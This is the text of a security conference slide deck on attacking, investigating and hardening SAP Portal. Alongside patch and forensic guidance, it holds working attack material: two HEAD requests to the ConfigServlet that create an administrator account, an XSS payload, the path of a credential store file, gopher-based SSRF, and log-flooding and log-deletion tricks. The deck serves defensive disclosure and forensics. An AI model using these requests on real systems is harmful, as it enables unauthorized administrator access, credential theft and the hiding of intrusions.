  • 27. Preven@on   27   LINK  to  SAP  HELP   •  The  HTTP  Provider  service  can  mask  security-­‐ sensi=ve  URL  parameters,  cookies,  or  headers         •  By  default,  only  for  the  headers  listed  below   –  Path  Parameter:  jsessionid   –  Request  Parameters:  j_password,    j_username,   j_sap_password,  j_sap_again,  oldPassword,   confirmNewPassword,=cket   –  HTTP  Headers:  Authoriza=on,  Cookie  (JSESSIONID,   MYSAPSSO2)  
  • 29. Access  Control     •   Web  Dynpro    -­‐  programma=c   •   Portal  iViews    -­‐  programma=c   •   J2EE  Web  apps    -­‐  declara=ve   29   Programma@c     By  UME   Declara@ve       By  WEB.XML  
  • 30. Access  Control   •  The  central  en=ty  in  the  J2EE  authoriza=on  model  is  the  security   role   •  Programmers  define  the  applica=on-­‐specific  roles  in  the  J2EE   deployment  descriptor   30   web.xml      web-­‐j2ee-­‐engine.xml  
  • 32. Verb  Tampering     •  If  we  are  trying  to  get  access  to  an  applica=on  using  GET  –  we   need  a  login:pass  and  administrator  role   •  What  if  we  try  to  get  access  to  applica=on  using  HEAD  instead   GET?   •  PROFIT!   •  Did  U  know  about  ctc?   32  
  • 33. Verb  Tampering     Need  Admin  account  in  SAP  Portal?     Just  send  two  HEAD  requests     •  Create  new  user  CONF:idence   HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig; CREATEUSER;USERNAME=CONF,PASSWORD=idence     •  Add  the  user  CONF  to  the  group  Administrators   HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig; ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators     *  Works  when  UME  uses  JAVA  database.       33  
  • 34. •  Install  SAP  notes  1503579,  1616259,  1589525,   1624450   •  Install  other  SAP  notes  about  Verb  Tampering       •  Scan  applica=ons  with  ERPScan  WEB.XML  checker     •  Disable  the  applica=ons  that  are  not  necessary     Preven@on   34  
  • 35. Inves@ga@on   [Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET / ctc/ConfigServlet HTTP/1.1 401 1790 [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD / ctc/ConfigServlet HTTP/1.1 200 0 [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD / ctc/ConfigServlet? param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME= CONF,PASSWORD=idence HTTP/1.0 200 0 j2eecluster<node>logsystemhttpaccess responses.trc 35  
  • 37. Invoker  Servlet   •  Want  to  execute  an  OS  command  on  J2EE  server  remotely?   •  Maybe  upload  a  backdoor  in  a  Java  class?   •  Or  sniff  all  traffic?   S=ll  remember  ctc?   37  
  • 38. Invoker  Servlet               38  
  • 39. Preven@on   39   •  Update  to  the  latest  patch  1467771,  1445998     •  “EnableInvokerServletGlobally”    must  be  “false”       •  Check  all  WEB.XML  files  with  ERPScan  WEBXML   checker    
  • 40. Inves@ga@on            #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352 03#/System/Security/Audit#sap.com/ tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit #Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/ a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[ impl: 3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain# ##Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]# #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420 62#/System/Security/Audit/J2EE#sap.com/ irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/ a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_ Application_Thread[impl: 3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audi t#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests# 40  
  • 42. XSS   •  Many  XSSs  in  Portal   •  But  some=mes  HcpOnly   •  But  when  we  exploit  XSS,  we  can  use  the  features  of  SAP  Portal   42   EPCF  
  • 43. EPCF   •  EPCF  provides  a  JavaScript  API  designed  for  the  client-­‐side   communica=on  between  portal  components  and  the  portal   core  framework   •  Enterprise  Portal  Client  Manager  (EPCM)   •  iViews  can  access  the  EPCM  object  from  every  portal  page   or  IFrame   •  Every  iView  contains  the  EPCM  object   <SCRIPT> alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"); </SCRIPT> 43   For  example,  EPCF  used  for  transient  user  data  buffer  for  iViews  
  • 44. Preven@on   44   •   Install  SAP  note  1656549  
  • 45. Inves@ga@on   #Plain###192.168.192.26 : GET /irj/servlet/ prt/portal/prtroot/ com.sap.portal.usermanagement.admin.UserMappi ng?systemid=MS_EXCHANGEaaaa%3C/script%3E %3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968# j2eecluster<node>logsystemhttpaccess responses.trc 45  
  • 46. Web  Dynpro  JAVA   •  Web  Dynpro  unauthorized  modifica=ons     •  For  example:   –  somebody  steals  an  account  using  XSS/CSRF/Sniffing   –  then  tries  to  modify  the  severity  level  of  logs   46  
  • 47. Web  Dynpro  JAVA   47   LINK  to  SAP  HELP  
  • 48. Inves@ga@on   •   No  traces  of  change  in  default  log  files   clusterserver0logsystemhttpaccessresponses.log •   Web  Dynpro  sends  all  data  by  POST,  and  we  only  see  GET  URLs  in   responses.log     •   But  some=mes  we  can  find  informa=on  by  indirect  signs   [Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET / webdynpro/resources/sap.com/ tc~lm~webadmin~log_config~wd/Components/ com.sap.tc.log_configurator.LogConfigurator/ warning.gif HTTP/1.1 200 110 •  The  client  loaded  images  from  the  server  during  some  changes   48  
  • 49. Inves@ga@on   •  Most  ac=ons  have  icons     •  They  have  to  be  loaded  from  the  server     •  Usually,  legi=mate  users  have  them  all  in  cache   •  Acackers  usually  don’t  have  them,  so  they  make  requests  to  the   server   •  That’s  how  we  can  iden=fy  poten=ally  malicious  ac=ons   •  But  there  should  be  correla=on  with  a  real  user’s  ac=vity   •  False  posi=ves  are  possible:   –  New  legi=mate  user     –  Old  user  clears  cache   –  Other     49  
  • 51. Directory  traversal  fix  bypass   51  
  • 52. Preven@on   52   •   Install  SAP  note  1630293  
  • 54. Breaking  SAP  Portal   •  Found  a  file  in  the  OS  of  SAP  Portal  with  the  encrypted   passwords  for  administra=on  and  DB   •  Found  a  file  in  the  OS  of  SAP  Portal  with  keys  to  decrypt   passwords   •  Found  a  vulnerability  (another  one  ;))  which  allows  reading  the   files  with  passwords  and  keys   •  Decrypt  passwords  and  log  into  Portal   •  PROFIT!   54  
  • 55. Read  the  file   How  can  we  read  the  file?     •  Directory  Traversal   •  OS  Command  execu=on     •  XML  External  En=ty  (XXE)   55  
  • 56. XXE  in  Portal:  Details   •   Injec=on  of  malicious  requests  into  XML  packets   •   Can  lead  to  unauthorized  file  read,  DoS,  SSRF     •   There  is  an  XXE  vulnerability  in  SAP  Portal   •   Can  be  exploited  by  modifica=on  of  POST  request   •   It  is  possible  to  read  any  file  from  OS  and  much  more   56  
  • 57. XXE  in  Portal           57  
  • 58. XXE  in  Portal           58  
  • 59. XXE   59   Error  based  XXE  
  • 60. XXE  in  Portal:  Result     •  We  can  read  any  file   •  Including  config  with  passwords   •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB;  its   password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.properties 60  
  • 65. Get  the  password   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   We  got  the  J2EE  admin  and  JDBC   login:password!   65  
  • 66. Preven@on   66   •   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.proper7es  and   SecStore.key  
  • 68. Inves@ga@on   •  The  only  one  way  to  get  HTTP  POST  request  values  is  to  enable   HTTP  Trace   •  Visual  Administrator  →  Dispatcher  →  HTTP  Provider   →  Proper=es:  HcpTrace  =  enable   •  For  6.4  and  7.0  SP12  and  lower:     –  On  Dispatcher:     /j2ee/cluster/dispatcher/log/defaultTrace.trc –  On  Server       j2eeclusterserver0logsystemhttpaccessresponses.0.trc •   For  7.0  SP13  and  higher:   /j2ee/cluster/dispatcher/log/services/http/req_resp.trc   •  Manually  analyze  all  requests  for  XXE  acacks   68  
  • 69. Malicious  file  upload:  A_ack   •  Knowledge  management  allows  uploading  to  the  server   different  types  of  files  that  can  store  malicious  content   •  Some=mes,  if  guest  access  is  allowed,  it  is  possible  to  upload   any  file  without  being  an  authen=cated  user   •  For  example,  it  can  be  an  HTML  file  with  JavaScript  that  steals   cookies   69  
  • 70. Malicious  file  upload:  A_ack   70  
  • 71. Malicious  file  upload:  A_ack   71  
  • 72. Malicious  file  upload:  Forensics   [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST / irj/servlet/prt/portal/prteventname/HtmlbEvent/ prtroot/pcd!3aportal_content!2fspecialist! 2fcontentmanager!2fContentManager! 2fcom.sap.km.ContentManager! 2fcom.sap.km.ContentExplorer! 2fcom.sap.km.ContentDocExplorer! 2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968 [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET / irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165   *Again,  images  can  help  us.   72  
  • 73. Malicious  file  upload:  Preven@on   73   Enable  File  Extension  and  Size  Filter:   •  System  Administra7on  →  System  Configura7on  →  Content   Management  →    Repository  →  Filters  →  Show  Advanced   Op7ons  →  File  Extension  and  Size  Filter     •  Select  either  the  All  repositories  parameter  or  at  least  one   repository  from  the  repository  list  in   the  Repositories  parameter  
  • 74. Malicious  file  upload:  Preven@on   74   Enable  Malicious  Script  Filter:   •  System  Administra7on  →  System  Configura7on  →  Content   Management  →    Repository  →  Filters  →  Show  Advanced   Op7ons  →  Malicious  Script  Filter     •  The  filter  also  detects  executable  scripts  in  files  that  are   being  modified  and  encodes  them  when  they  are  saved   –  enable  Forbidden  Scripts.  Comma-­‐separated  list  of  banned  script   tags  that  will  be  encoded  when  the  filter  is  applied   –  enable  the  Send  E-­‐Mail  to  Administrator  op@on  
  • 75. Portal  post-­‐exploita@on   •  Lot  of  links  to  other  systems  in  corporate  LAN   •  Using  SSRF,  acackers  can  get  access  to  these  systems   What  is  SSRF?   75  
  • 76. •  We  send  Packet  A  to  Service  A   •  Service  A  ini=ates  Packet  B  to  service  B   •  Services  can  be  on  the  same  or  different  hosts   •  We  can  manipulate  some  fields  of  packet  B  within  packet  A   •  Various  SSRF  acacks  depend  on  how  many  fields  we  can  control   on  packet  B     76   Packet  A   Packet  B   SSRF  History:  Basics  
  • 77. 77   HTTP  Server    Corporate   network   Direct  acack      GET  /vuln.jsp     SSRF  Acack     SSRF  Acack     Get  /vuln.jst     A   B   Par@al  Remote  SSRF:     HTTP  a_acks  on  other  services  
  • 78. Gopher  uri  scheme   •  Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP   packets   –   Exploit  OS  vulnerabili=es   –   Exploit  old  SAP  applica@on  vulnerabili@es     –   Bypass  SAP  security  restric=ons   –   Exploit  vulnerabili=es  in  local  services     More  info  in  our  BH2012  presenta=on:   SSRF  vs.  Business  Cri7cal  Applica7ons   LINK   78  
  • 81. An@-­‐forensics   •  Flooding   •  Dele=ng   •  Changing   81  
  • 82. An@-­‐forensics   Log  flooding   •  5  ac=ve  logs   •  Maximum  log  file  size  is  10  Mb   •  Archiving  when  all  logs  reach  the  maximum  size   •  If  file.0.log  -­‐>  max  size  then  open  file.1.log   •  If  file.4.log  -­‐>  max  size  then  zip  all  and  backup   •  Rewri=ng  the  same  files  aber  archiving   82  
  • 83. An@-­‐forensics   Log  dele@ng   •  SAP  locks  write  access  to  the  only  one  ac=ve  log   •  SAP  allows  reading/wri=ng  logs,  so  it  is  possible  to  delete  them   •  It  could  compromise  the  acacker’s  presence   Log  changing   •  SAP  locks  write  access  only  to  the  one  ac=ve  log   •  It  is  possible  to  write  into  any  other  log  file     83  
  • 84. Securing  SAP  Portal   •  Patching   •  Secure  configura=on   •  Enabling  HTTP  Trace  with  masking   •  Malicious  script  filter   •  Log  archiving   •  Addi=onal  place  for  log  storage   •  Monitoring  of  security  events   –  Own  scripts,  parse  common  pacerns   –  ERPScan  has  all  exis=ng  web  vulns/0-­‐day  pacerns   84  
  • 85. It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure   SAP  guides   It’s  all  in  your  hands   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   Segrega@on  of  du@es   85   Conclusion  
  • 86.  I'd  like  to  thank  SAP's  Product  Security  Response  Team  for  the   great  coopera7on  to  make  SAP  systems  more  secure.  Research   is  always  ongoing,  and  we  can't  share  all  of  it  today.  If  you  want   to  be  the  first  to  see  new  aTacks  and  demos,  follow  us  at   @erpscan  and  aTend  future  presenta7ons:   July  31  –  BlackHat  (Las  Vegas,  USA)   86   Future  work  
  • 87. Web:                      www.erpscan.com   e-­‐mail:        info@erpscan.com                                     Twicer:     @erpscan   @_chipik   @neyolov   87